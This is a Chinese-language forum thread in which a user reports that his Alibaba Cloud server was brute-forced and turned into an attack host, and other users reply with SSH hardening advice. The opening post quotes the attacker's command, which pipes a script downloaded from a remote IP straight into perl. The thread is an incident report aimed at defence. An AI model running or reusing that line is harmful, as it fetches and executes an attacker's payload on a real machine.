webfamer

阿里云被人暴力破解了

  •  
  •   webfamer · 1 day ago · 10528 views
    看了下最近登陆地是法国,那人用这个命令:bash -c echo -e "\033[0m";echo -ne " \033[93m[\033[91m 1491/15819 \033[93m] \033[93m[\033[97m Executing cmd to \033[92m123.56.152.41:22 \033[93m] \033[96m ";wget -qO - 61.14.210.71/.j/sus3|perl

    下载了一堆爆破工具包到我服务器上,然后用我服务器跑攻击脚本。现在服务器被阿里云判定为恶意攻击,暂时封禁了
    Supplement 1  ·  1 day ago
    抱歉抱歉,没有标题党的意思。给客户部署都是阿里云这么说的,和他们说服务器他们也不懂,说阿里云就很知道。叫习惯了
    Supplement 2  ·  12h 47m ago
    直接把 22 端口,3389 ,3386 全关了,大家都别用,省的再出岔子
    51 replies    2026-07-15 12:57:56 +08:00
    webfamer
        1
    webfamer  
    OP
       1 day ago
    Yanlongli
        2
    Yanlongli  
       1 day ago
    太正常了,服务器天天被扫
    所以只开 私钥登录
    snowfuck
        3
    snowfuck  
       1 day ago
    没有类似 cloudflare tunnel 的东西吗?我一般都不暴露 ssh 端口出来。
    opengps
        4
    opengps  
       1 day ago   ❤️ 2
    有点这样的经历挺好的,不然根本理解不了为什么要做那么对防护操作,也理解不了渗透往往只是几个简单的漏洞组合起来的严重后果
    SoulFlame
        5
    SoulFlame  
       1 day ago   ❤️ 19
    只是你自己的云服务器。。。我还以为是阿里云。。。
    jacketma
        6
    jacketma  
       1 day ago
    @webfamer 楼主 ssh 用的弱密码吗?我的阿里云为了方便也开了远程 ssh 登录,端口也没改,不过是强密码,很多年了,看到一直有攻击,一直都没事😄
    y1y1
        7
    y1y1  
       1 day ago   ❤️ 7
    这标题起的
    icanfork
        8
    icanfork  
       1 day ago
    这标题,云服务器第一件事就是
    1. 禁止 root 登录
    2. 禁止密码登录,使用 ssh 密钥登录
    3. 修改默认 ssh 端口 22 到其他
    lululau
        9
    lululau  
       1 day ago   ❤️ 5
    你咋不说银河系被人暴力破解了
    w2GvCF
        10
    w2GvCF  
       1 day ago
    可以加强 ECS 安全组规则防护,限制远程连接服务器的 IP 地址,只允许自己的 IP 连接。
    定期修改服务器密码,设置复杂的密码,建议设置用 ssh 密钥方式远程连接服务器。
    这样基本就可以防护暴力破解了
    Cu635
        11
    Cu635  
       1 day ago
    最关键的,别人是怎么登录上去的没说,是 ssh 弱密码?
    june4
        12
    june4  
       1 day ago
    ssh 的 root 默认应该是个挺长的随机密码吧,几乎不太可能是这个原因,除非你为了自己方便改了弱密码。
    ThisDay
        13
    ThisDay  
       1 day ago
    不要总想搞个大新闻
    ingram22mb30
        14
    ingram22mb30  
       1 day ago
    123.56.152.41 ( C 段画像)‘恶意 IP 暴力破解’,整个/24 里一个 IP 是恶意 IP 。
    killva4624
        15
    killva4624  
       1 day ago
    你在 UC 上的班?
    menyuguren
        16
    menyuguren  
       1 day ago
    安装了哪吒面板?
    layxy
        17
    layxy  
       1 day ago
    我的 ssh 只开 ip 白名单访问,ip 平时不咋变,如果 ip 容易变嫌麻烦就使用密钥登录吧
    5waker
        18
    5waker  
       1 day ago
    ssh 换端口就能避免很多问题了,如果 ip 固定也可以考虑 ip 白名单
    jackerbauer
        19
    jackerbauer  
       1 day ago
    标题党
    opeth
        20
    opeth  
       1 day ago
    你这题目起的,我以为是阿里的服务器被攻击了
    wwwwjack
        21
    wwwwjack  
       1 day ago
    ssh 换端口 + 动态口令登录
    dhb233
        22
    dhb233  
       1 day ago
    前面看起来就是带颜色的字符串打印,不知道为什么还要带颜色。。。
    cecil2016
        23
    cecil2016  
       1 day ago
    @lululau 来 UC 报道
    cecil2016
        24
    cecil2016  
       1 day ago
    这标题起的
    BaiLinfeng
        25
    BaiLinfeng  
       1 day ago
    所以你的服务器是做的啥项目,他看上了
    Panameragt
        26
    Panameragt  
       1 day ago
    阿里云安全中心:😓
    WAHSUN
        27
    WAHSUN  
       1 day ago via iPhone
    在服务器中安装一个 Hermes ,让它给系统做安全加固,系统安全审计等工作,每天封禁封禁恶意 ip 。




    ---

    3 層防禦

    第 1 層:iptables 預設 DROP

    任何未明確允許的連線直接丟棄,並記錄到 /var/log/kern.log 。

    iptables-DROPPED: ... SRC=1.2.3.4 ...


    第 2 層:fail2ban ( SSH 監控)

    監控 SSH 日誌,有暴力嘗試就封鎖。不過因為密碼登入已關閉,目前累計 0 封鎖。

    第 3 層:auto-ban-ips.sh ✅ 已修復

    ⏰ 排程****
    • 內容: 每天 04:00

    📄 讀取來源****
    • 內容: /var/log/kern.log + kern.log.1

    🎯 門檻****
    • 內容: 累計 10 次以上 DROP 記錄的 IP

    🔧 動作****
    • 內容: iptables -A INPUT -s IP -j DROP

    💾 持久化****
    • 內容: iptables-save > /etc/iptables/rules.v4

    📧 通知****
    • 內容: 寄信到 [email protected]

    今天日誌裡已經有 10 個超過門檻的 IP 待處理(最高一個打了 397 次),明天凌晨就會自動 ban 掉它們。
    kevan
        28
    kevan  
       1 day ago
    标题党太狠了,害我白高兴以为阿里云官方沦陷了
    ZTom
        29
    ZTom  
       1 day ago
    666 ,去 uc 上班把
    ala2008
        30
    ala2008  
       1 day ago
    @icanfork 还漏一个设置 ip 白名单😁
    unclemcz
        31
    unclemcz  
       1 day ago via Android
    现在云服务器被暴力 ssh 的概率很低了,更多的是装了什么有漏洞的服务被无差别扫到了。
    新服务器保命第一步,开白名单或者私钥。
    pinylin
        32
    pinylin  
       1 day ago
    换端口没用,照样一堆渗透的
    1. 22 端口 用 endlessh 恶心他们,(我看到有 sb 脚本小子一次卡两三个小时的)
    2. 换个端口 用 fail2ban 继续拉黑名单
    zerovoid
        33
    zerovoid  
       1 day ago
    小心阿里云公关连夜给你发律师函。

    我阿里云服务器被人骇入了(√)
    阿里云被人破解了( x )
    nrtEBH
        34
    nrtEBH  
       1 day ago
    标题党啊标题党
    kasusa
        35
    kasusa  
       1 day ago
    @unclemcz 我之前的就被暴力破解了。
    这玩意还是不能用简单密码。
    A55555
        36
    A55555  
       1 day ago
    建议先学习中文语法主谓宾的含义。
    EvaElfie
        37
    EvaElfie  
       1 day ago
    开个密钥登录就完事了,哪这么多事
    flyqie
        38
    flyqie  
       1 day ago
    你这标题吓我一跳,还寻思阿里云怎么有这问题了
    sampeng
        39
    sampeng  
       1 day ago via iPhone
    所以我一直都是要屌用密码登录的
    WilliamColton
        40
    WilliamColton  
       1 day ago
    @sampeng #39 牛,哈哈哈哈哈哈
    germain
        41
    germain  
       1 day ago via iPhone
    很喜欢自己报名被 B 的
    fcoo
        42
    fcoo  
       1 day ago
    把 22 端口改了,然后密码设置长点复杂一些就能防大部分了
    siddharth
        43
    siddharth  
       1 day ago
    @lululau 好暴躁,我喜欢。
    cnrting
        44
    cnrting  
       1 day ago via iPhone   ❤️ 1
    等着被发律师函吧
    liuzimin
        45
    liuzimin  
       1 day ago via Android
    大家都在说防爆破,有没有可能会是利用漏洞提权搞事的啊?像前段时间爆出了好多提权漏洞。
    xuanbg
        46
    xuanbg  
       21h 8m ago
    还是搞个 ip 白名单吧
    cnevil
        47
    cnevil  
       20h 32m ago
    我还以为阿里云出啥大瓜了。。结果点进来就是自己的机子被人打了 那不纯自己的问题
    IamUNICODE
        48
    IamUNICODE  
       20h 24m ago
    看标题我还以为阿里云 free 了
    crocoii
        49
    crocoii  
       19h 33m ago via Android
    修改 ssh 端口杜绝 99.9999%这类问题
    e3c78a97e0f8
        50
    e3c78a97e0f8  
       18h 41m ago
    @liuzimin 要利用提权漏洞,前提是能在机器上执行任意代码。那必须是先有个别的漏洞让人钻进来,能够低权限执行代码,然后才能利用提权漏洞。
    laminux29
        51
    laminux29  
       16h 57m ago
    数据库端口直接开公网了吧..
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   945 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 325ms · UTC 21:55 · PVG 05:55 · LAX 14:55 · JFK 17:55
    ♥ Do have faith in what you're doing.